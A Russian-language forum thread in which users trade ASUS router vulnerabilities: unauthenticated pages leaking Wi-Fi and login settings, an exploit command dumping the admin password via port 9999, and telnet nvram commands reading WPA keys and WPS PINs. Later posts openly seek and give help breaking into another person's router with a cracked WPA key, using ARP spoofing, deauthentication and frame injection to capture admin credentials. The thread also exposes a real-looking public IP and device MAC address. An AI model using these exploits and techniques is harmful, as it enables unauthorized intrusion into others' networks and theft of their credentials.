Вот вам ещё уязвимость ASUS: http://192.168.1.1/WPS_info.asp Показывает настройки дочки доступа. Обнаружил только что, данная тема промотивировала Уязвимы: ASUS RT-N13 ASUS RT-N13U ASUS RT-N13U Rev.B1 ASUS RT-N56U http://192.168.1.1/QIS_wizard.htm <input type="hidden" name="http_username" value="admin"> <input type="hidden" name="http_passwd" value="admin"> Уязвимы: ASUS RT-N13 ASUS RT-N13U ASUS RT-N13U Rev.B1
Не за что Вот ещё - http://90.155.158.9/get_webdavInfo.asp Уязвимость получения информации SSID, BSSID, версии прошивки и т.п. Code: // pktInfo=['PrinterInfo','SSID','NetMask','ProductID','FWVersion','OPMode','MACAddr','Regulation']; pktInfo=['','inet','255.255.255.0','RT-N66U','3.0.0.4.270','1','60:A4:4C:EF:F2:08','']; // webdavInfo=['Webdav','HTTPType','HTTPPort','DDNS','HostName','WAN0IPAddr','','xSetting','HTTPSPort']; webdavInfo=['0','2','8082','0','','90.155.158.9','','1','443']; Уязвим: ASUS RT-N66U ASUS RT-AC68U ASUS RT-N16 ASUS RT-AC66U ASUS RT-N56U ASUS RT-N65U
Дописал уязвимость: http://192.168.1.1/QIS_wizard.htm <input type="hidden" name="http_username" value="admin"> <input type="hidden" name="http_passwd" value="admin"> Уязвимы: ASUS RT-N13U ASUS RT-N13U Rev.B1 чуть незабыл она выбирается в 'Comand:' ТЫЦ А вот немного просканил и открылись: ASUS RT-G32 Rev.C1 ASUS RT-G32 ASUS RT-N10 Rev.B1 ASUS RT-N10 ASUS RT-N10+ ASUS RT-N10E ASUS RT-N10LX ASUS RT-N12E ASUS RT-N12LX ASUS RT-N13U Rev.B1 ASUS RT-N13U ASUS WL-520GU RT-N10LX
Искать новые уязвимости самостоятельно. Срабатывание текущих експлойтов на асусах зависит от прошивок.
через пару часиков выложу, если кто раньше не выложит. з.ы что у автора проги не осталось http://rghost.ru/58102445
Я ее переписал под свои нужды а в личку попросили! Вроде нашел сам. Ссылка обновилась. Всем спасибо! ТЫЦ
под асусы есть хороший сплоит https://github.com/jduck/asus-cmd/blob/master/others/fp-xdb-35688.py (если порт 9999 открыт, то есть шанс) на N15U прокатило, хотя баг описаный выше -нет пароль выдирается из памяти устройства: Code: python3 fp-xdb-35688.py 192.168.1.1 "/usr/sbin/nvram get http_passwd"
Новая порция эксплоитов для асусов: http://habrahabr.ru/post/253013/ Кстати, уязвимость о которой говорил предыдущий пользователь теперь есть и как программка для винды (AsusCmd.exe). Из-за ограничений этой уязвимости, советую ее использовать только для включения telnet на роутере. Далее через telnet можно cd /bin nvram get wl_ssid nvram get wl_wpa_psk nvram get wps_device_pin nvram get http_passwd nvram set тоже есть, короче полный доступ, даже лучше админки
Хотел оживить тему таким вопросом. Есть точка ASUS RT-N11P со вскрытым WPA, нужно зайти в админку, пароль видимо пользователь установил свой. Пробовал уязвимости из этой темы - открывается вроде http://192.168.1.1/error_page.htm, но поиск в исходном коде ничего не даёт. Пробовал РоутерСкан 2.53 - вбил в него 192.168.1.1 (адрес в локалке при подключенном wifi, адрес моего роутера через который подключаюсь установил 192.168.2.1), настройки программы не трогал - всё по умолчанию - выдаёт только версию прошивки ASUS RT-N11P, firmware: 2.0. На сколько понял (читал где-то) в этой версии РоутерСкана имеются эксплойты для этой модели. Возможно что-то делаю не так - подскажите, может быть есть какие тонкости, и если всё правильно, в чём может быть проблема - вероятно в этой версии прошивки все дыры закрыты? Так же пробовал прогу AsusCmd.exe отсюда https://habrahabr.ru/post/253013/, так же при wifi подключении, выдаёт всегда LOST - возможно команду не правильно ввёл, если не сложно - можно пример правильного использования программы? Дальше решил попробовать mdk3 + wireshark (советовали перехватить пароль при входе пользователя в админку) - если правильно мыслю, нужно заставить человека войти в админку - деаутентификация всех клиентов от точки - mdk3 для этого должна подойти (ей владею), дальше перехват пароля в wireshark (которую нужно освоить). Вопросы выше просто чтобы понять, все ли средства использовал (и правильно ли), и больше ничего не сработает, прежде чем использовать "тяжёлую артиллерию" и физически мешать человеку . И правильно ли мыслю про mdk3 + wireshark (может быть есть способы проще)?
Для asus можно сделать так: В http трафик клиента, в html код страничек вставляется фрейм со ссылкой на страничку роутера, браузер клиента при загрузке либо отдаст логин + пароль сам, если его знает, либо будет требовать его у юзера, пока тот не введёт правильный. После чего остаётся декодировать соотв. хидер в запросе браузера к роутеру.
Если вы уже внутри сети, не стоит заморачиваться mdk3 и деаутентификациями, проще и удобнее использовать методики MITM (о чём написано постом выше).
Разобрался более-менее с MITM, организовал АРП-спуфинг при помощи arpspoof, снифер - wireshark. Хотел попросить, если не сложно, в виде примера показать каким образом вставляется фрейм для автоперенаправления всех запросов в админку роутера (в этом профан, не знаю с какой стороны подойти ): Ещё хотел уточнить такой момент - пробовал разными способами механизм работы MITM (ettercap, и т.д.) - остановился на вышеперечисленных arpspoof + wireshark - всё работает без тормозов и глюков - тестировал на собственной импровизированной сети (2 цели - планшет на Андройде и роутер на OpenWrt, атакующий комп с Арчем и адаптером DWA-582) . Пробовал каким образом происходит снифинг пароля админки (фильтрация в акуле по http.request.method == "POST") - в этой пробной сети передаётся открыто, сразу увидел логин+пароль. Дальше организовал уже на реальной сети с роутером ASUS (про который выше), произвёл пробную авторизацию в админку роутера, просто на вскидку admin 12345, получил такое: Правильно ли понимаю, что введённая (неверная) пара логин+пароль зашифрована в YWRtaW46MTIzNDU%3D (о чём выше), и если да, как это расшифровывается (т.е. нужно в сторону hashcat смотреть - ей владею)?